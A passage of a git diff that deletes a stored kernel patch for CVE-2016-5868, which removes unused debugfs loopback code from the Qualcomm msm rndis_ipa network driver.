= scnprintf(enable_str, 
sizeof(enable_str), "%d\n", *enable); -- ret = simple_read_from_buffer(ubuf, count, ppos, enable_str, nbytes); -- if (ret < 0) { -- RNDIS_IPA_ERROR("simple_read_from_buffer problem\n"); -- return ret; -- } -- size += ret; -- count -= nbytes; -- *ppos = pos + size; -- return size; --} -- --static ssize_t rndis_ipa_debugfs_enable_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos) --{ -- unsigned long missing; -- char input; -- bool *enable = file->private_data; -- if (count != sizeof(input) + 1) { -- RNDIS_IPA_ERROR("wrong input length(%zd)\n", count); -- return -EINVAL; -- } -- if (!buf) { -- RNDIS_IPA_ERROR("Bad argument\n"); -- return -EINVAL; -- } -- missing = copy_from_user(&input, buf, 1); -- if (missing) -- return -EFAULT; -- RNDIS_IPA_DEBUG("input received %c\n", input); -- *enable = input - '0'; -- RNDIS_IPA_DEBUG("value was set to %d\n", *enable); -- return count; --} -- --/** -- * Connects IPA->BAMDMA -- * This shall simulate the path from IPA to USB -- * Allowing the driver TX path -- */ --static int rndis_ipa_loopback_pipe_create( -- struct rndis_ipa_dev *rndis_ipa_ctx, -- struct rndis_loopback_pipe *loopback_pipe) --{ -- int retval; -- -- RNDIS_IPA_LOG_ENTRY(); -- -- /* SPS pipe has two side handshake -- * This is the first handshake of IPA->BAMDMA, -- * This is the IPA side -- */ -- loopback_pipe->ipa_connect_params.client = loopback_pipe->ipa_client; -- loopback_pipe->ipa_connect_params.client_bam_hdl = -- rndis_ipa_ctx->bam_dma_hdl; -- loopback_pipe->ipa_connect_params.client_ep_idx = -- loopback_pipe->peer_pipe_index; -- loopback_pipe->ipa_connect_params.desc_fifo_sz = BAM_DMA_DESC_FIFO_SIZE; -- loopback_pipe->ipa_connect_params.data_fifo_sz = BAM_DMA_DATA_FIFO_SIZE; -- loopback_pipe->ipa_connect_params.notify = loopback_pipe->ipa_callback; -- loopback_pipe->ipa_connect_params.priv = rndis_ipa_ctx; -- loopback_pipe->ipa_connect_params.ipa_ep_cfg = -- *(loopback_pipe->ipa_ep_cfg); -- -- /* loopback_pipe->ipa_sps_connect 
is out param */ -- retval = ipa_connect(&loopback_pipe->ipa_connect_params, -- &loopback_pipe->ipa_sps_connect, -- &loopback_pipe->ipa_drv_ep_hdl); -- if (retval) { -- RNDIS_IPA_ERROR("ipa_connect() fail (%d)", retval); -- return retval; -- } -- RNDIS_IPA_DEBUG("ipa_connect() succeeded, ipa_drv_ep_hdl=%d", -- loopback_pipe->ipa_drv_ep_hdl); -- -- /* SPS pipe has two side handshake -- * This is the second handshake of IPA->BAMDMA, -- * This is the BAMDMA side -- */ -- loopback_pipe->dma_sps = sps_alloc_endpoint(); -- if (!loopback_pipe->dma_sps) { -- RNDIS_IPA_ERROR("sps_alloc_endpoint() failed "); -- retval = -ENOMEM; -- goto fail_sps_alloc; -- } -- -- retval = sps_get_config(loopback_pipe->dma_sps, -- &loopback_pipe->dma_connect); -- if (retval) { -- RNDIS_IPA_ERROR("sps_get_config() failed (%d)", retval); -- goto fail_get_cfg; -- } -- -- /* Start setting the non IPA ep for SPS driver*/ -- loopback_pipe->dma_connect.mode = loopback_pipe->mode; -- -- /* SPS_MODE_DEST: DMA end point is the dest (consumer) IPA->DMA */ -- if (loopback_pipe->mode == SPS_MODE_DEST) { -- -- loopback_pipe->dma_connect.source = -- loopback_pipe->ipa_sps_connect.ipa_bam_hdl; -- loopback_pipe->dma_connect.src_pipe_index = -- loopback_pipe->ipa_sps_connect.ipa_ep_idx; -- loopback_pipe->dma_connect.destination = -- rndis_ipa_ctx->bam_dma_hdl; -- loopback_pipe->dma_connect.dest_pipe_index = -- loopback_pipe->peer_pipe_index; -- -- /* SPS_MODE_SRC: DMA end point is the source (producer) DMA->IPA */ -- } else { -- -- loopback_pipe->dma_connect.source = -- rndis_ipa_ctx->bam_dma_hdl; -- loopback_pipe->dma_connect.src_pipe_index = -- loopback_pipe->peer_pipe_index; -- loopback_pipe->dma_connect.destination = -- loopback_pipe->ipa_sps_connect.ipa_bam_hdl; -- loopback_pipe->dma_connect.dest_pipe_index = -- loopback_pipe->ipa_sps_connect.ipa_ep_idx; -- -- } -- -- loopback_pipe->dma_connect.desc = loopback_pipe->ipa_sps_connect.desc; -- loopback_pipe->dma_connect.data = 
loopback_pipe->ipa_sps_connect.data; -- loopback_pipe->dma_connect.event_thresh = 0x10; -- /* BAM-to-BAM */ -- loopback_pipe->dma_connect.options = SPS_O_AUTO_ENABLE; -- -- RNDIS_IPA_DEBUG("doing sps_connect() with - "); -- RNDIS_IPA_DEBUG("src bam_hdl:0x%lx, src_pipe#:%d", -- loopback_pipe->dma_connect.source, -- loopback_pipe->dma_connect.src_pipe_index); -- RNDIS_IPA_DEBUG("dst bam_hdl:0x%lx, dst_pipe#:%d", -- loopback_pipe->dma_connect.destination, -- loopback_pipe->dma_connect.dest_pipe_index); -- -- retval = sps_connect(loopback_pipe->dma_sps, -- &loopback_pipe->dma_connect); -- if (retval) { -- RNDIS_IPA_ERROR("sps_connect() fail for BAMDMA side (%d)", -- retval); -- goto fail_sps_connect; -- } -- -- RNDIS_IPA_LOG_EXIT(); -- -- return 0; -- --fail_sps_connect: --fail_get_cfg: -- sps_free_endpoint(loopback_pipe->dma_sps); --fail_sps_alloc: -- ipa_disconnect(loopback_pipe->ipa_drv_ep_hdl); -- return retval; --} -- --static void rndis_ipa_destroy_loopback_pipe( -- struct rndis_loopback_pipe *loopback_pipe) --{ -- sps_disconnect(loopback_pipe->dma_sps); -- sps_free_endpoint(loopback_pipe->dma_sps); --} -- --/** -- * rndis_ipa_create_loopback() - create a BAM-DMA loopback -- * in order to replace the USB core -- */ --static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx) --{ -- /* The BAM handle should be use as -- * source/destination in the sps_connect() -- */ -- int retval; -- -- RNDIS_IPA_LOG_ENTRY(); -- -- -- retval = sps_ctrl_bam_dma_clk(true); -- if (retval) { -- RNDIS_IPA_ERROR("fail on enabling BAM-DMA clocks"); -- return -ENODEV; -- } -- -- /* Get BAM handle instead of USB handle */ -- rndis_ipa_ctx->bam_dma_hdl = sps_dma_get_bam_handle(); -- if (!rndis_ipa_ctx->bam_dma_hdl) { -- RNDIS_IPA_ERROR("sps_dma_get_bam_handle() failed"); -- return -ENODEV; -- } -- RNDIS_IPA_DEBUG("sps_dma_get_bam_handle() succeeded (0x%x)", -- rndis_ipa_ctx->bam_dma_hdl); -- -- /* IPA<-BAMDMA, NetDev Rx path (BAMDMA is the USB stub) */ -- 
rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_client = -- IPA_CLIENT_USB_PROD; -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.peer_pipe_index = -- FROM_USB_TO_IPA_BAMDMA; -- /*DMA EP mode*/ -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.mode = SPS_MODE_SRC; -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_ep_cfg = -- &usb_to_ipa_ep_cfg_deaggr_en; -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_callback = -- rndis_ipa_packet_receive_notify; -- RNDIS_IPA_DEBUG("setting up IPA<-BAMDAM pipe (RNDIS_IPA RX path)"); -- retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx, -- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe); -- if (retval) { -- RNDIS_IPA_ERROR("fail to close IPA->BAMDAM pipe"); -- goto fail_to_usb; -- } -- RNDIS_IPA_DEBUG("IPA->BAMDAM pipe successfully connected (TX path)"); -- -- /* IPA->BAMDMA, NetDev Tx path (BAMDMA is the USB stub)*/ -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_client = -- IPA_CLIENT_USB_CONS; -- /*DMA EP mode*/ -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.mode = SPS_MODE_DEST; -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_ep_cfg = &ipa_to_usb_ep_cfg; -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.peer_pipe_index = -- FROM_IPA_TO_USB_BAMDMA; -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_callback = -- rndis_ipa_tx_complete_notify; -- RNDIS_IPA_DEBUG("setting up IPA->BAMDAM pipe (RNDIS_IPA TX path)"); -- retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx, -- &rndis_ipa_ctx->ipa_to_usb_loopback_pipe); -- if (retval) { -- RNDIS_IPA_ERROR("fail to close IPA<-BAMDAM pipe"); -- goto fail_from_usb; -- } -- RNDIS_IPA_DEBUG("IPA<-BAMDAM pipe successfully connected(RX path)"); -- -- RNDIS_IPA_LOG_EXIT(); -- -- return 0; -- --fail_from_usb: -- rndis_ipa_destroy_loopback_pipe( -- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe); --fail_to_usb: -- -- return retval; --} -- --static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx) --{ -- rndis_ipa_destroy_loopback_pipe( -- &rndis_ipa_ctx->ipa_to_usb_loopback_pipe); -- rndis_ipa_destroy_loopback_pipe( -- 
&rndis_ipa_ctx->usb_to_ipa_loopback_pipe); -- sps_dma_free_bam_handle(rndis_ipa_ctx->bam_dma_hdl); -- if (sps_ctrl_bam_dma_clk(false)) -- RNDIS_IPA_ERROR("fail to disable BAM-DMA clocks"); --} -- --/** -- * rndis_ipa_setup_loopback() - create/destroy a loopback on IPA HW -- * (as USB pipes loopback) and notify RNDIS_IPA netdev for pipe connected -- * @enable: flag that determines if the loopback should be created or destroyed -- * @rndis_ipa_ctx: driver main context -- * -- * This function is the main loopback logic. -- * It shall create/destory the loopback by using BAM-DMA and notify -- * the netdev accordingly. -- */ --static int rndis_ipa_setup_loopback(bool enable, -- struct rndis_ipa_dev *rndis_ipa_ctx) --{ -- int retval; -- -- if (!enable) { -- rndis_ipa_destroy_loopback(rndis_ipa_ctx); -- RNDIS_IPA_DEBUG("loopback destroy done"); -- retval = rndis_ipa_pipe_disconnect_notify(rndis_ipa_ctx); -- if (retval) { -- RNDIS_IPA_ERROR("connect notify fail"); -- return -ENODEV; -- } -- return 0; -- } -- -- RNDIS_IPA_DEBUG("creating loopback (instead of USB core)"); -- retval = rndis_ipa_create_loopback(rndis_ipa_ctx); -- RNDIS_IPA_DEBUG("creating loopback- %s", (retval ? "FAIL" : "OK")); -- if (retval) { -- RNDIS_IPA_ERROR("Fail to connect loopback"); -- return -ENODEV; -- } -- retval = rndis_ipa_pipe_connect_notify( -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_drv_ep_hdl, -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_drv_ep_hdl, -- BAM_DMA_DATA_FIFO_SIZE, -- 15, -- BAM_DMA_DATA_FIFO_SIZE - rndis_ipa_ctx->net->mtu, -- rndis_ipa_ctx); -- if (retval) { -- RNDIS_IPA_ERROR("connect notify fail"); -- return -ENODEV; -- } -- -- return 0; -- --} -- - static int rndis_ipa_init_module(void) - { - pr_info("RNDIS_IPA module is loaded."); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2016-5868/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-5868/3.18/0002.patch deleted file mode 100644 index df9b3317..00000000 
--- a/Patches/Linux_CVEs/CVE-2016-5868/3.18/0002.patch
+++ /dev/null
@@ -1,519 +0,0 @@ -From 0ada77c044be09db1a35e4718209f41d05d27fe0 Mon Sep 17 00:00:00 2001 -From: Ghanim Fodi -Date: Tue, 27 Dec 2016 13:32:35 +0200 -Subject: msm: rndis_ipa: Remove rndis_ipa loopback functionality - -Rndis_ipa loopback functionality at rndis_ipa driver -is a debug functionality that is not used. - -Change-Id: Ibbcb26d3871cffeb46b028efcf4d428e88eb9e10 -CRs-fixed: 1104431 -Signed-off-by: Ghanim Fodi ---- - drivers/net/ethernet/msm/rndis_ipa.c | 430 ----------------------------------- - 1 file changed, 430 deletions(-) - -diff --git a/drivers/net/ethernet/msm/rndis_ipa.c b/drivers/net/ethernet/msm/rndis_ipa.c -index e411693..179e708 100644 ---- a/drivers/net/ethernet/msm/rndis_ipa.c -+++ b/drivers/net/ethernet/msm/rndis_ipa.c -@@ -135,29 +135,6 @@ enum rndis_ipa_operation { - RNDIS_IPA_DEBUG("Driver state: %s\n",\ - rndis_ipa_state_string(ctx->state)); - --/** -- * struct rndis_loopback_pipe - hold all information needed for -- * pipe loopback logic -- */ --struct rndis_loopback_pipe { -- struct sps_pipe *ipa_sps; -- struct ipa_sps_params ipa_sps_connect; -- struct ipa_connect_params ipa_connect_params; -- -- struct sps_pipe *dma_sps; -- struct sps_connect dma_connect; -- -- struct sps_alloc_dma_chan dst_alloc; -- struct sps_dma_chan ipa_sps_channel; -- enum sps_mode mode; -- u32 ipa_peer_bam_hdl; -- u32 peer_pipe_index; -- u32 ipa_drv_ep_hdl; -- u32 ipa_pipe_index; -- enum ipa_client_type ipa_client; -- ipa_notify_cb ipa_callback; -- struct ipa_ep_cfg *ipa_ep_cfg; --}; - - /** - * struct rndis_ipa_dev - main driver context parameters -@@ -172,13 +149,9 @@ struct rndis_loopback_pipe { - * @rx_dump_enable: dump all Rx packets - * @icmp_filter: allow all ICMP packet to pass through the filters - * @rm_enable: flag that enable/disable Resource manager request prior to Tx -- * @loopback_enable: flag that enable/disable USB stub loopback - * @deaggregation_enable: enable/disable IPA HW deaggregation logic - * @during_xmit_error: flags that indicate that 
the driver is in a middle - * of error handling in Tx path -- * @usb_to_ipa_loopback_pipe: usb to ipa (Rx) pipe representation for loopback -- * @ipa_to_usb_loopback_pipe: ipa to usb (Tx) pipe representation for loopback -- * @bam_dma_hdl: handle representing bam-dma, used for loopback logic - * @directory: holds all debug flags used by the driver to allow cleanup - * for driver unload - * @eth_ipv4_hdr_hdl: saved handle for ipv4 header-insertion table -@@ -209,12 +182,8 @@ struct rndis_ipa_dev { - u32 rx_dump_enable; - u32 icmp_filter; - u32 rm_enable; -- bool loopback_enable; - u32 deaggregation_enable; - u32 during_xmit_error; -- struct rndis_loopback_pipe usb_to_ipa_loopback_pipe; -- struct rndis_loopback_pipe ipa_to_usb_loopback_pipe; -- u32 bam_dma_hdl; - struct dentry *directory; - uint32_t eth_ipv4_hdr_hdl; - uint32_t eth_ipv6_hdr_hdl; -@@ -279,31 +248,12 @@ static int resource_request(struct rndis_ipa_dev *rndis_ipa_ctx); - static void resource_release(struct rndis_ipa_dev *rndis_ipa_ctx); - static netdev_tx_t rndis_ipa_start_xmit(struct sk_buff *skb, - struct net_device *net); --static int rndis_ipa_loopback_pipe_create( -- struct rndis_ipa_dev *rndis_ipa_ctx, -- struct rndis_loopback_pipe *loopback_pipe); --static void rndis_ipa_destroy_loopback_pipe( -- struct rndis_loopback_pipe *loopback_pipe); --static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx); --static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx); --static int rndis_ipa_setup_loopback(bool enable, -- struct rndis_ipa_dev *rndis_ipa_ctx); --static int rndis_ipa_debugfs_loopback_open(struct inode *inode, -- struct file *file); - static int rndis_ipa_debugfs_atomic_open(struct inode *inode, - struct file *file); - static int rndis_ipa_debugfs_aggr_open(struct inode *inode, - struct file *file); - static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file, - const char __user *buf, size_t count, loff_t *ppos); --static ssize_t 
rndis_ipa_debugfs_loopback_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_enable_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_enable_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos); --static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos); - static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file, - char __user *ubuf, size_t count, loff_t *ppos); - static void rndis_ipa_dump_skb(struct sk_buff *skb); -@@ -338,12 +288,6 @@ const struct file_operations rndis_ipa_debugfs_atomic_ops = { - .read = rndis_ipa_debugfs_atomic_read, - }; - --const struct file_operations rndis_ipa_loopback_ops = { -- .open = rndis_ipa_debugfs_loopback_open, -- .read = rndis_ipa_debugfs_loopback_read, -- .write = rndis_ipa_debugfs_loopback_write, --}; -- - const struct file_operations rndis_ipa_aggr_ops = { - .open = rndis_ipa_debugfs_aggr_open, - .write = rndis_ipa_debugfs_aggr_write, -@@ -2253,14 +2197,6 @@ static void rndis_ipa_debugfs_init(struct rndis_ipa_dev *rndis_ipa_ctx) - goto fail_file; - } - -- file = debugfs_create_file("loopback_enable", flags_read_write, -- rndis_ipa_ctx->directory, -- rndis_ipa_ctx, &rndis_ipa_loopback_ops); -- if (!file) { -- RNDIS_IPA_ERROR("could not create outstanding file\n"); -- goto fail_file; -- } -- - file = debugfs_create_u8("state", flags_read_only, - rndis_ipa_ctx->directory, (u8 *)&rndis_ipa_ctx->state); - if (!file) { -@@ -2424,59 +2360,6 @@ static ssize_t rndis_ipa_debugfs_aggr_write(struct file *file, - return count; - } - --static int rndis_ipa_debugfs_loopback_open(struct inode *inode, -- struct file *file) --{ -- struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private; -- file->private_data = rndis_ipa_ctx; -- -- return 0; --} -- --static ssize_t rndis_ipa_debugfs_loopback_read(struct file *file, -- char __user 
*ubuf, size_t count, loff_t *ppos) --{ -- int cnt; -- struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data; -- -- file->private_data = &rndis_ipa_ctx->loopback_enable; -- -- cnt = rndis_ipa_debugfs_enable_read(file, -- ubuf, count, ppos); -- -- return cnt; --} -- --static ssize_t rndis_ipa_debugfs_loopback_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos) --{ -- int retval; -- int cnt; -- struct rndis_ipa_dev *rndis_ipa_ctx = file->private_data; -- bool old_state = rndis_ipa_ctx->loopback_enable; -- -- file->private_data = &rndis_ipa_ctx->loopback_enable; -- -- cnt = rndis_ipa_debugfs_enable_write(file, -- buf, count, ppos); -- -- RNDIS_IPA_DEBUG("loopback_enable was set to:%d->%d\n", -- old_state, rndis_ipa_ctx->loopback_enable); -- -- if (old_state == rndis_ipa_ctx->loopback_enable) { -- RNDIS_IPA_ERROR("NOP - same state\n"); -- return cnt; -- } -- -- retval = rndis_ipa_setup_loopback( -- rndis_ipa_ctx->loopback_enable, -- rndis_ipa_ctx); -- if (retval) -- rndis_ipa_ctx->loopback_enable = old_state; -- -- return cnt; --} -- - static int rndis_ipa_debugfs_atomic_open(struct inode *inode, struct file *file) - { - struct rndis_ipa_dev *rndis_ipa_ctx = inode->i_private; -@@ -2507,319 +2390,6 @@ static ssize_t rndis_ipa_debugfs_atomic_read(struct file *file, - return simple_read_from_buffer(ubuf, count, ppos, atomic_str, nbytes); - } - --static ssize_t rndis_ipa_debugfs_enable_read(struct file *file, -- char __user *ubuf, size_t count, loff_t *ppos) --{ -- int nbytes; -- int size = 0; -- int ret; -- loff_t pos; -- u8 enable_str[sizeof(char)*3] = {0}; -- bool *enable = file->private_data; -- pos = *ppos; -- nbytes = scnprintf(enable_str, sizeof(enable_str), "%d\n", *enable); -- ret = simple_read_from_buffer(ubuf, count, ppos, enable_str, nbytes); -- if (ret < 0) { -- RNDIS_IPA_ERROR("simple_read_from_buffer problem\n"); -- return ret; -- } -- size += ret; -- count -= nbytes; -- *ppos = pos + size; -- return size; --} -- --static 
ssize_t rndis_ipa_debugfs_enable_write(struct file *file, -- const char __user *buf, size_t count, loff_t *ppos) --{ -- unsigned long missing; -- char input; -- bool *enable = file->private_data; -- if (count != sizeof(input) + 1) { -- RNDIS_IPA_ERROR("wrong input length(%zd)\n", count); -- return -EINVAL; -- } -- if (!buf) { -- RNDIS_IPA_ERROR("Bad argument\n"); -- return -EINVAL; -- } -- missing = copy_from_user(&input, buf, 1); -- if (missing) -- return -EFAULT; -- RNDIS_IPA_DEBUG("input received %c\n", input); -- *enable = input - '0'; -- RNDIS_IPA_DEBUG("value was set to %d\n", *enable); -- return count; --} -- --/** -- * Connects IPA->BAMDMA -- * This shall simulate the path from IPA to USB -- * Allowing the driver TX path -- */ --static int rndis_ipa_loopback_pipe_create( -- struct rndis_ipa_dev *rndis_ipa_ctx, -- struct rndis_loopback_pipe *loopback_pipe) --{ -- int retval; -- -- RNDIS_IPA_LOG_ENTRY(); -- -- /* SPS pipe has two side handshake -- * This is the first handshake of IPA->BAMDMA, -- * This is the IPA side -- */ -- loopback_pipe->ipa_connect_params.client = loopback_pipe->ipa_client; -- loopback_pipe->ipa_connect_params.client_bam_hdl = -- rndis_ipa_ctx->bam_dma_hdl; -- loopback_pipe->ipa_connect_params.client_ep_idx = -- loopback_pipe->peer_pipe_index; -- loopback_pipe->ipa_connect_params.desc_fifo_sz = BAM_DMA_DESC_FIFO_SIZE; -- loopback_pipe->ipa_connect_params.data_fifo_sz = BAM_DMA_DATA_FIFO_SIZE; -- loopback_pipe->ipa_connect_params.notify = loopback_pipe->ipa_callback; -- loopback_pipe->ipa_connect_params.priv = rndis_ipa_ctx; -- loopback_pipe->ipa_connect_params.ipa_ep_cfg = -- *(loopback_pipe->ipa_ep_cfg); -- -- /* loopback_pipe->ipa_sps_connect is out param */ -- retval = ipa_connect(&loopback_pipe->ipa_connect_params, -- &loopback_pipe->ipa_sps_connect, -- &loopback_pipe->ipa_drv_ep_hdl); -- if (retval) { -- RNDIS_IPA_ERROR("ipa_connect() fail (%d)", retval); -- return retval; -- } -- RNDIS_IPA_DEBUG("ipa_connect() succeeded, 
ipa_drv_ep_hdl=%d", -- loopback_pipe->ipa_drv_ep_hdl); -- -- /* SPS pipe has two side handshake -- * This is the second handshake of IPA->BAMDMA, -- * This is the BAMDMA side -- */ -- loopback_pipe->dma_sps = sps_alloc_endpoint(); -- if (!loopback_pipe->dma_sps) { -- RNDIS_IPA_ERROR("sps_alloc_endpoint() failed "); -- retval = -ENOMEM; -- goto fail_sps_alloc; -- } -- -- retval = sps_get_config(loopback_pipe->dma_sps, -- &loopback_pipe->dma_connect); -- if (retval) { -- RNDIS_IPA_ERROR("sps_get_config() failed (%d)", retval); -- goto fail_get_cfg; -- } -- -- /* Start setting the non IPA ep for SPS driver*/ -- loopback_pipe->dma_connect.mode = loopback_pipe->mode; -- -- /* SPS_MODE_DEST: DMA end point is the dest (consumer) IPA->DMA */ -- if (loopback_pipe->mode == SPS_MODE_DEST) { -- -- loopback_pipe->dma_connect.source = -- loopback_pipe->ipa_sps_connect.ipa_bam_hdl; -- loopback_pipe->dma_connect.src_pipe_index = -- loopback_pipe->ipa_sps_connect.ipa_ep_idx; -- loopback_pipe->dma_connect.destination = -- rndis_ipa_ctx->bam_dma_hdl; -- loopback_pipe->dma_connect.dest_pipe_index = -- loopback_pipe->peer_pipe_index; -- -- /* SPS_MODE_SRC: DMA end point is the source (producer) DMA->IPA */ -- } else { -- -- loopback_pipe->dma_connect.source = -- rndis_ipa_ctx->bam_dma_hdl; -- loopback_pipe->dma_connect.src_pipe_index = -- loopback_pipe->peer_pipe_index; -- loopback_pipe->dma_connect.destination = -- loopback_pipe->ipa_sps_connect.ipa_bam_hdl; -- loopback_pipe->dma_connect.dest_pipe_index = -- loopback_pipe->ipa_sps_connect.ipa_ep_idx; -- -- } -- -- loopback_pipe->dma_connect.desc = loopback_pipe->ipa_sps_connect.desc; -- loopback_pipe->dma_connect.data = loopback_pipe->ipa_sps_connect.data; -- loopback_pipe->dma_connect.event_thresh = 0x10; -- /* BAM-to-BAM */ -- loopback_pipe->dma_connect.options = SPS_O_AUTO_ENABLE; -- -- RNDIS_IPA_DEBUG("doing sps_connect() with - "); -- RNDIS_IPA_DEBUG("src bam_hdl:0x%lx, src_pipe#:%d", -- loopback_pipe->dma_connect.source, -- 
loopback_pipe->dma_connect.src_pipe_index); -- RNDIS_IPA_DEBUG("dst bam_hdl:0x%lx, dst_pipe#:%d", -- loopback_pipe->dma_connect.destination, -- loopback_pipe->dma_connect.dest_pipe_index); -- -- retval = sps_connect(loopback_pipe->dma_sps, -- &loopback_pipe->dma_connect); -- if (retval) { -- RNDIS_IPA_ERROR("sps_connect() fail for BAMDMA side (%d)", -- retval); -- goto fail_sps_connect; -- } -- -- RNDIS_IPA_LOG_EXIT(); -- -- return 0; -- --fail_sps_connect: --fail_get_cfg: -- sps_free_endpoint(loopback_pipe->dma_sps); --fail_sps_alloc: -- ipa_disconnect(loopback_pipe->ipa_drv_ep_hdl); -- return retval; --} -- --static void rndis_ipa_destroy_loopback_pipe( -- struct rndis_loopback_pipe *loopback_pipe) --{ -- sps_disconnect(loopback_pipe->dma_sps); -- sps_free_endpoint(loopback_pipe->dma_sps); --} -- --/** -- * rndis_ipa_create_loopback() - create a BAM-DMA loopback -- * in order to replace the USB core -- */ --static int rndis_ipa_create_loopback(struct rndis_ipa_dev *rndis_ipa_ctx) --{ -- /* The BAM handle should be use as -- * source/destination in the sps_connect() -- */ -- int retval; -- -- RNDIS_IPA_LOG_ENTRY(); -- -- -- retval = sps_ctrl_bam_dma_clk(true); -- if (retval) { -- RNDIS_IPA_ERROR("fail on enabling BAM-DMA clocks"); -- return -ENODEV; -- } -- -- /* Get BAM handle instead of USB handle */ -- rndis_ipa_ctx->bam_dma_hdl = sps_dma_get_bam_handle(); -- if (!rndis_ipa_ctx->bam_dma_hdl) { -- RNDIS_IPA_ERROR("sps_dma_get_bam_handle() failed"); -- return -ENODEV; -- } -- RNDIS_IPA_DEBUG("sps_dma_get_bam_handle() succeeded (0x%x)", -- rndis_ipa_ctx->bam_dma_hdl); -- -- /* IPA<-BAMDMA, NetDev Rx path (BAMDMA is the USB stub) */ -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_client = -- IPA_CLIENT_USB_PROD; -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.peer_pipe_index = -- FROM_USB_TO_IPA_BAMDMA; -- /*DMA EP mode*/ -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.mode = SPS_MODE_SRC; -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_ep_cfg = -- 
&usb_to_ipa_ep_cfg_deaggr_en; -- rndis_ipa_ctx->usb_to_ipa_loopback_pipe.ipa_callback = -- rndis_ipa_packet_receive_notify; -- RNDIS_IPA_DEBUG("setting up IPA<-BAMDAM pipe (RNDIS_IPA RX path)"); -- retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx, -- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe); -- if (retval) { -- RNDIS_IPA_ERROR("fail to close IPA->BAMDAM pipe"); -- goto fail_to_usb; -- } -- RNDIS_IPA_DEBUG("IPA->BAMDAM pipe successfully connected (TX path)"); -- -- /* IPA->BAMDMA, NetDev Tx path (BAMDMA is the USB stub)*/ -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_client = -- IPA_CLIENT_USB_CONS; -- /*DMA EP mode*/ -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.mode = SPS_MODE_DEST; -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_ep_cfg = &ipa_to_usb_ep_cfg; -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.peer_pipe_index = -- FROM_IPA_TO_USB_BAMDMA; -- rndis_ipa_ctx->ipa_to_usb_loopback_pipe.ipa_callback = -- rndis_ipa_tx_complete_notify; -- RNDIS_IPA_DEBUG("setting up IPA->BAMDAM pipe (RNDIS_IPA TX path)"); -- retval = rndis_ipa_loopback_pipe_create(rndis_ipa_ctx, -- &rndis_ipa_ctx->ipa_to_usb_loopback_pipe); -- if (retval) { -- RNDIS_IPA_ERROR("fail to close IPA<-BAMDAM pipe"); -- goto fail_from_usb; -- } -- RNDIS_IPA_DEBUG("IPA<-BAMDAM pipe successfully connected(RX path)"); -- -- RNDIS_IPA_LOG_EXIT(); -- -- return 0; -- --fail_from_usb: -- rndis_ipa_destroy_loopback_pipe( -- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe); --fail_to_usb: -- -- return retval; --} -- --static void rndis_ipa_destroy_loopback(struct rndis_ipa_dev *rndis_ipa_ctx) --{ -- rndis_ipa_destroy_loopback_pipe( -- &rndis_ipa_ctx->ipa_to_usb_loopback_pipe); -- rndis_ipa_destroy_loopback_pipe( -- &rndis_ipa_ctx->usb_to_ipa_loopback_pipe); -- sps_dma_free_bam_handle(rndis_ipa_ctx->bam_dma_hdl); -- if (sps_ctrl_bam_dma_clk(false)) -- RNDIS_IPA_ERROR("fail to disable BAM-DMA clocks"); --} -- --/** -- * rndis_ipa_setup_loopback() - create/destroy a loopback on IPA HW -- * (as USB pipes loopback) and 
notify RNDIS_IPA netdev for pipe connected -- * @enable: flag that determines if the loopback should be created or destroyed -- * @rndis_ipa_ctx: driver main context -- * -- * This function is the main loopback logic. -- * It shall create/destory the loopback by using BAM-DMA and notify -- * the netdev accordingly. -- */ --static int rndis_ipa_setup_loopback(bool enable, -- struct rndis_ipa_dev *rndis_ipa_ctx) --{ -- int retval; -- -- if (!enable) { -- rndis_ipa_destroy_loopback(rndis_ipa_ctx); -- RNDIS_IPA_DEBUG("loopback destroy done"); -- retval = rndis_ipa_pipe_disconnect_notify(rndis_ipa_ctx); -- if (retval) { -- RNDIS_IPA_ERROR("connect notify fail"); -- return -ENODEV; -- } -- return 0; -- } -- -- RNDIS_IPA_DEBUG("creating loopback (instead of USB core)"); -- retval = rndis_ipa_create_loopback(rndis_ipa_ctx); -- RNDIS_IPA_DEBUG("creating loopback- %s", (retval ? "FAIL" : "OK")); -- if (retval) { -- 